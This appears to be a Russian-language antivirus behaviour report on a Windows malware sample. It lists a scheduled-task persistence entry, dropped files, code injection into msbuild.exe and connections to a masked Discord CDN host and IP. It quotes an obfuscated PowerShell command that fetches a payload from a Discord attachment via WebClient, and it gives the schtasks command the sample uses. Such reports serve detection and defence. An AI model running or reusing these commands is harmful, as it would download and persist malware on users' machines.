Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\updates\neodsn
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $cqhsGtEhW='*.*-EX'.replace('*.*-','I'); sal bsbqkQGmN $cqhsGtEhW;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://cdn.discordapp.com/attachments/8144089458286...
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\vjkewrcar.exe
- %APPDATA%\neodsn.exe
- %TEMP%\tmpedd7.tmp
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\run.dat
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\catalog.dat
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\storage.dat
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\settings.bin
Удаляет следующие файлы
- %TEMP%\tmpedd7.tmp
Сетевая активность
Подключается к
- 'cd#.##scordapp.com':443
- '18#.#40.53.130':2364
TCP
- 'cd#.##scordapp.com':443
- '18#.#40.53.130':2364
UDP
- DNS ASK cd#.##scordapp.com
Другое
Создает и запускает на исполнение
- '%TEMP%\vjkewrcar.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $cqhsGtEhW='*.*-EX'.replace('*.*-','I'); sal bsbqkQGmN $cqhsGtEhW;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://cdn.discordapp.com/attachments/8144089458286...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\neodsN" /XML "%TEMP%\tmpEDD7.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\neodsN" /XML "%TEMP%\tmpEDD7.tmp"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'
